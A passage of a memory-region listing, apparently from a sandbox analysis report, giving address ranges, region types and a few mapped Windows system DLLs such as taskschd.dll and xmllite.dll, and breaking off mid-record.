Region: id = 1522 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1523 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1524 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1525 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1526 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1527 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1528 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1529 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1530 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1531 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1532 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1533 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1534 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1535 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1536 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1537 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1538 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1539 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1540 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1541 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1542 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1543 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1544 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1545 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1546 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1547 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1548 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1549 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1550 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1551 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1552 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1553 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1554 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1555 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1556 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1557 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1558 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1559 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1560 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1561 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1562 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1563 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1564 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1565 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1566 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1567 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1568 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1569 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1570 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1571 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1572 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1573 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1574 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1575 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1576 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1577 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1578 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1579 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1580 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1581 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1582 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1583 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1584 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1585 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1586 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1587 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1588 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1589 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1590 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1591 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1592 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1593 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1594 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1595 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1596 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1597 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1598 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1599 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1600 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1601 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1602 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1603 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1604 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1605 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1606 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1607 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1608 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1609 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1610 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1611 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1612 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1613 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1614 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1615 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1616 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1617 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1618 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1619 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1620 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1621 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1622 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1623 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1624 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1625 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1626 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1627 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1628 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1629 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1630 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1631 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1632 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1633 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1634 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1635 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1636 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1637 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1638 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1639 start_va = 0x7ffb10c70000 end_va = 0x7ffb10d0bfff monitored = 0 entry_point = 0x7ffb10cc96a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 1640 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1641 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1642 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1643 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1644 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1645 start_va = 0x10af0000 end_va = 0x10b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010af0000" filename = "" Region: id = 1646 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1647 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1648 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1649 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1650 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1651 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1652 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1653 start_va = 0x7ffb21b50000 end_va = 0x7ffb21b85fff monitored = 0 entry_point = 0x7ffb21b60070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1654 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1655 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1656 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1657 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1658 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2047 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2048 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2049 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2050 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2051 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2052 start_va = 0xf390000 end_va = 0xf881fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f390000" filename = "" Region: id = 2053 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2054 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2055 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2056 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2057 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2058 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2059 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2060 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2061 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2062 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2063 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2064 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2065 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2066 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2067 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2068 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2069 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2070 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2071 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2072 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2073 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2074 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2075 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2076 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2077 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2078 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2079 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2080 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2081 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2082 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2083 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2084 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2085 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2086 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2087 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2088 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2089 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2090 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2091 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2092 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2093 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2094 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2095 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2096 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2097 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2098 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2099 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2100 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2101 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2102 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = 